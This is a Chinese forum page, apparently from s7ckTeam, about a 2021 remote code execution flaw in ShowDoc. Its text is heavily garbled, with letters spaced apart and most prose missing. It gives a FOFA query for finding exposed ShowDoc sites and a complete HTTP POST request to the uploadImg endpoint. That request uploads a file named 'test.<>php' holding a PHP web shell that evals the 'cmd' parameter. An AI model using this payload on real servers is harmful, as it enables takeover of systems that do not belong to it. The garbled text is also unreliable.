[7577] 2021-04-25_ShowDoc远程代码执行漏洞

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-17
2021-04-25_ShowDoc远程代码执行漏洞 S h o w D o c       b g b i n g   2 0 2 1 - 0 4 - 2 5 f o f a a p p = " S h o w D o c " 便 使 P O C
r e s p o n s e 访 P O S T   / i n d e x . p h p ? s = / h o m e / p a g e / u p l o a d I m g   H T T P / 1 . 1 H o s t :   x x x . x x x . x x x . x x x U s e r - A g e n t :   M o z i l l a / 5 . 0   ( W i n d o w s   N T   1 0 . 0 ;   W i n 6 4 ;   x 6 4 )   A p p l e W e b K i t / 5 3 7 . 3 6   ( K H T M L ,   l i k e   G e c k o ) A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e A c c e p t :   * / * C o n n e c t i o n :   c l o s e C o n t e n t - T y p e :   m u l t i p a r t / f o r m - d a t a ;   b o u n d a r y = - - - - - - - - - - - - - - - - - - - - - - - - - - 9 2 1 3 7 8 1 2 6 3 7 1 6 2 3 7 6 2 1 7 3 6 1 7 C o n t e n t - L e n g t h :   2 5 9 - - - - - - - - - - - - - - - - - - - - - - - - - - - - 9 2 1 3 7 8 1 2 6 3 7 1 6 2 3 7 6 2 1 7 3 6 1 7 C o n t e n t - D i s p o s i t i o n :   f o r m - d a t a ;   n a m e = " e d i t o r m d - i m a g e - f i l e " ;   f i l e n a m e = " t e s t . < > p h p " C o n t e n t - T y p e :   t e x t / p l a i n < ? p h p   e c h o   ' 1 2 3 _ t e s t ' ; @ e v a l ( $ _ G E T [ c m d ] ) ? > - - - - - - - - - - - - - - - - - - - - - - - - - - - - 9 2 1 3 7 8 1 2 6 3 7 1 6 2 3 7 6 2 1 7 3 6 1 7 - -



您需要登录后才可以回帖 登录 | 立即注册

本版积分规则